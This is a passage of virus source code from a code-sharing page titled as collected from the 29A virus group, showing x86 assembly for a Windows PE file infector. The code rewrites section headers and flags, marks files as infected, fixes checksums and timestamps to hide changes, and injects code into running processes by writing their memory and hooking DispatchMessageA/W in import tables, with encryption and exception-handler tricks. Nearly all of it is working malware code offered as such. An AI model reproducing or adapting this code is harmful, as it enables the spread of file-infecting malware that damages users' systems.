29a-7.007
来自「从29A上收集的病毒源码」· 007 代码 · 共 2,527 行 · 第 1/5 页
007
2,527 行
file_op_2:
mov dword ptr [ebp+blk_min_size-file_op_ip],INF_MIN_BLK_SIZE
pushad
sub edi,[edx+0ch]
add edi,[edx+4]
mov ebx,[edx] ;VirtualSize
mov edi,[edx+8] ;SizeOfRawData
xor esi,esi
cmp ebx,edi
jna short file_op_3
xchg edi,ebx
inc esi
file_op_3:
add ebx,ecx
add ebx,8
file_op_4:
cmp ebx,edi ;is bigger one less than small one?
jna short file_op_5 ;no
add edi,[eax+3ch] ;FileAlignment
jmp short file_op_4
file_op_5:
or esi,esi
jz short file_op_6
xchg edi,ebx
file_op_6:
mov [edx],ebx
mov [edx+8],edi
popad
rep movsb
or dword ptr [edx+1ch],00000040h or 40000000h; modify section's Characteristics
and dword ptr [edx+1ch],not 02020000 ;delete discardable Characteristics
goto_next_section:
mov ecx,vir_size
remaind_size equ $-4
jecxz file_op_ok
call is_final_section
jnz next_section
jmp first_section
file_op_ok:
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
;Round image size
mov ecx,[edx]
add ecx,[edx+4]
mov ebx,[eax+50h]
file_op_9:
cmp ecx,ebx
jbe short file_op_10
add ebx,[eax+38h]
jmp short file_op_9
file_op_10:
mov [eax+50h],ebx
;Round physical size
mov ecx,[edx+8]
add ecx,[edx+0ch]
cmp ecx,[esp+8]
jc short file_op_11
mov [esp+8],ecx
file_op_11:
pop esi ;esi=file base
push esi
mov byte ptr [esi+MEM_INF_POS],MEM_INF_SIGN ;Set memory infected sign.
;Recalculate checksum if there is any
lea ebx,[eax+58h]
mov ecx,[ebx] ;Is the checksum zero?
jecxz no_checksum ;Yes,it's zero,nothing to do;
;Now let me calculate the checksum
mov dword ptr [ebx],0 ;zero the checksum
mov ecx,[esp+8] ;the file size
push ecx ;the file size after infect
shr ecx,1
xor edx,edx
checksum_loop:
movzx eax, word ptr [esi]
add edx, eax
mov eax, edx
and edx, 0ffffh
shr eax, 10h
add edx, eax
inc esi
inc esi
loop checksum_loop
mov eax, edx
shr eax, 10h
add ax, dx
pop ecx
add eax,ecx
;Now eax is the checksum,store it
mov [ebx],eax
no_checksum:
file_op_unmapping:
mov esp,12345678h
file_op_esp equ $-4
;Now esp have point to file mapping base pointer
call [ebp+addrUnmapViewOfFile-file_op_ip]
file_op_fail_mapviewoffile:
call [ebp+addrCloseHandle-file_op_ip] ;Close file mapping
file_op_fail_createfilemapping:
pop eax ;eax=file size
push large 0
push large 0
push eax
push dword ptr [esp+4*3]
call [ebp+addrSetFilePointer-file_op_ip]
push dword ptr [esp]
call [ebp+addrSetEndOfFile-file_op_ip] ;truncate the file to fit size
file_op_fail_getfilesize:
pop eax
push eax
lea ebx,[ebp+ftime-file_op_ip]
push ebx ;ebx->file last write time
add ebx,8
push ebx
add ebx,8
push ebx
push eax
call [ebp+addrSetFileTime-file_op_ip]
call [ebp+addrCloseHandle-file_op_ip] ;Close file
file_op_fail_createfile:
call [ebp+addrSetFileAttributesA-file_op_ip]
xor ecx,ecx
POP DWord Ptr FS:[ecx] ; restore except chain
pop ecx
pop ecx
file_op_ret:
popad
retn
file_op_seh:
call file_op_seh_ip
file_op_seh_ip:
pop eax
lea eax,[eax-(file_op_seh_ip-file_op_unmapping)]
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
;in--edx->current section VirtualSize,eax->PE base,ebx->base address,ebp->file_op_ip
;out--ZF set is final,ZF cleared isn't final
is_final_section:
pushad
mov ecx,edx
xor edi,edi
SUBCALL get_section_of_rva,file_op_ip
cmp ecx,edx
popad
retn
is_final_section_end:
file_operate_end:
;*******************************infect.asm end*****************************
;*******************************infproc.asm*****************************
;include infproc.asm
;Code to inject to process
CALLHEADER inject_code
inject_code:
jmp short $+2
inject_code_flow equ $-1
pushad
pushfd
call inject_code_ip
inject_code_ip:
pop ebp
xor esi,esi
call inject_code_1
db FMAP_NAME
inject_code_1:
push esi
push large FILE_MAP_WRITE
mov edx,12345678h
inject_code_openfilemapping equ $-4
call edx
or eax,eax
jz short inject_code_goto_raw
push esi
push esi
push esi
push large FILE_MAP_WRITE
push eax
mov edx,12345678
inject_code_mapviewoffile equ $-4
call edx
or eax,eax
jz short inject_code_goto_raw
mov byte ptr [ebp+inject_code_flow-inject_code_ip],inject_code_goto_raw_1-inject_code_flow-1
lea ebp,[eax+_start_ip-vir_header]
add eax,main_enter-vir_header
call eax
inject_code_goto_raw:
popfd
popad
inject_code_goto_raw_1:
push large 12345678h
inject_code_raw_api equ $-4
retn
inject_code_end:
inject_code_size equ $-inject_code
;in--edi=process handle,ebx->process base address,ebp->inf_proc_ip
;out--ZF set,failed ZF cleared,success
CALLHEADER virtual_protect
virtual_protect:
pushad
push ecx
push esp
push large PAGE_EXECUTE_READWRITE
push large INFPROC_PROT_SIZE
push ebx
push edi
call [ebp+addrVirtualProtectEx-inf_proc_ip]
pop ecx
or eax,eax
popad
retn
virtual_protect_end:
;in--edi=process handle,ebx=process address to read,ebp->inf_proc_ip
;out--read data to vbuffer,eax->vbuffer
CALLHEADER read_proc_mem
read_proc_mem:
lea eax,[ebp+vbuffer-inf_proc_ip]
pushad
push ecx
push esp
push large INFPROC_MAP_SIZE
push eax
push ebx
push edi
call [ebp+addrReadProcessMemory-inf_proc_ip]
pop ecx
or eax,eax
popad
retn
read_proc_mem_end:
;in--edi=process handle,ebx=process address to write,ebp->inf_proc_ip,eax->buffer,ecx=size to write
;out--write data from vbuffer
CALLHEADER write_proc_mem
write_proc_mem:
pushad
push ecx
push esp
push ecx
push eax
push ebx
push edi
call [ebp+addrWriteProcessMemory-inf_proc_ip]
pop ecx
or eax,eax
popad
retn
write_proc_mem_end:
;in--edi=process handle,ebx->process base address
CALLHEADER inf_proc
inf_proc:
pushad
call inf_proc_ip
inf_proc_ip:
pop ebp
push ebp
lea esi,[ebp+inf_proc_seh-inf_proc_ip]
push esi
xor esi,esi
push dword ptr fs:[esi]
mov fs:[esi],esp
lea esi,[ebp+inject_code-inf_proc_ip]
push esi
call blk_decrypt
pushad
mov ecx,[ebp+addrMapViewOfFile-inf_proc_ip]
mov [ebp+inject_code_mapviewoffile-inf_proc_ip],ecx
mov ecx,[ebp+addrOpenFileMappingA-inf_proc_ip]
mov [ebp+inject_code_openfilemapping-inf_proc_ip],ecx
call inf_proc_0
db FMAP_NAME
inf_proc_0:
pop edi
push edi
push large 0
push large FILE_MAP_WRITE
call ecx
or eax,eax
jz short inf_proc_not_mapped
push eax
call [ebp+addrCloseHandle-inf_proc_ip]
jmp short inf_proc_mapped
inf_proc_not_mapped:
mov eax,vir_mem_size
mov ecx,eax
SUBCALL create_mem_map,inf_proc_ip
jz short inf_proc_mapped
cld
mov edi,eax
xor eax,eax
stosd
mov eax,vir_size
stosd
lea esi,[ebp+_start-inf_proc_ip]
rep movsb
mov [ebp+quick_sleep-inf_proc_ip],esi ;Have quick sleep
inf_proc_mapped:
popad
mov [ebp+inf_proc_esp-inf_proc_ip],esp
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_ret
;edi ;Process handle
;ebx Process base address
;eax vbuffer address
push edi
push ebx
SUBCALL read_proc_mem,inf_proc_ip
cmp byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN ;Has been infected?
inf_proc_seh_restore_jmp:
jz inf_proc_seh_restore
mov byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table
mov ebx,eax
SUBCALL check_pe,inf_proc_ip
jz short inf_proc_seh_restore_jmp
;eax->PE base
mov edi,[eax+28h]
SUBCALL get_section_of_rva,inf_proc_ip
or ecx,ecx
jz short inf_proc_seh_restore_jmp
mov edi,[edx+4]
mov [ebp+inf_proc_rva-inf_proc_ip],edi
mov edi,[edx]
mov ecx,[edx+8]
cmp edi,ecx
jna short inf_proc_3
xchg ecx,edi
inf_proc_3:
;Now edi is the small size,ecx is the big one
mov [ebp+inf_proc_code_size-inf_proc_ip],edi
sub ecx,edx
cmp ecx,inject_code_size
jc inf_proc_seh_restore
mov ecx,[eax+80h] ;Import directory
or ecx,ecx
jz short inf_proc_seh_restore_jmp
pop ebx
pop edi
push ebx
add ebx,ecx
push ecx
SUBCALL read_proc_mem,inf_proc_ip
push edx
SUBCALL get_rand,inf_proc_ip
movzx ecx,dl
and cl,3fh
pop edx
pop esi
mov ebx,eax
sub ebx,5*4
push ecx
inf_proc_101:
add ebx,5*4
mov ecx,[ebx+3*4]
jecxz inf_proc_102
push eax
sub ecx,esi
cmp ecx,INFPROC_MAP_SIZE
jnc short inf_proc_102
mov eax,[eax+ecx]
call eax_to_lowcase
cmp eax,'resu' ;user
pop eax
jnz short inf_proc_101
mov dword ptr [esp],1000h
mov eax,ebx
inf_proc_102:
pop ecx
mov ebx,[eax+4*4]
add ebx,[esp]
push ebx
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_seh_restore
SUBCALL read_proc_mem,inf_proc_ip ;read import table
mov esi,eax
cld
inf_proc_1:
lodsd
cmp eax,[ebp+addrDispatchMessageA-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
cmp eax,[ebp+addrDispatchMessageW-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
or eax,eax
loopnz inf_proc_1
inf_proc_1_5:
sub esi,4
or eax,eax
jnz short inf_proc_2
sub esi,4
inf_proc_2:
mov eax,[esi]
mov [ebp+inject_code_raw_api-inf_proc_ip],eax
mov ebx,[esp+4]
add ebx,12345678h
inf_proc_rva equ $-4
add ebx,12345678h
inf_proc_code_size equ $-4
mov [esi],ebx
SUBCALL virtual_protect,inf_proc_ip
jz short inf_proc_seh_restore
lea eax,[ebp+inject_code-inf_proc_ip]
push large inject_code_size
pop ecx
SUBCALL write_proc_mem,inf_proc_ip ;Write inject code
jz short inf_proc_seh_restore
pop ebx
lea eax,[ebp+vbuffer-inf_proc_ip]
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table
inf_proc_ret:
inf_proc_seh_restore:
mov esp,12345678h
inf_proc_esp equ $-4
SUBCALL get_rand,inf_proc_ip
pop esi
mov [esi-4],dx
call blk_encrypt
POP DWord Ptr FS:[0] ; restore except chain
pop esi
pop esi
popad
retn
inf_proc_seh:
call inf_proc_seh_ip
inf_proc_seh_ip:
pop eax
lea eax,[eax-(inf_proc_seh_ip-inf_proc_seh_restore)]
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
inf_proc_end:
CALLHEADER enum_proc
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?